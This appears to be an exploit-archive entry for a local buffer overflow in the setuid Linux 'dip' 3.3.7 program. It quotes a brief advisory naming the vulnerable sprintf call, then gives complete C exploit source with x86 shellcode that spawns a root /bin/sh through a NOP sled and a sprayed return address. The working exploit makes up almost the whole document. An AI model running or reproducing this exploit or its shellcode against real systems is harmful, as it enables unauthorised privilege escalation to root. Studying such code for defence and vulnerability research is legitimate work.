Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)

// source: https://www.securityfocus.com/bid/86/info

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

/* Linux x86 dip 3.3.7p exploit by pr10n */


#include <stdio.h>

#define NOP 0x90


/*thanks to hack.co.za*/
char shellcode[] =
          "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
          "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
          "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
          "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";



unsigned long get_sp(void){ __asm__("movl %esp, %eax");}

main(int argc, char *argv[]){

char buf[136];
int i;
int offset=0,*ptr;
long ret;


if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}

offset=atoi(argv[1]);

ret=(get_sp()-offset);

for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}

printf("\nusing: 0x%x\n\n",ret);

for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;

memcpy(buf+i,shellcode,strlen(shellcode));

execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);

}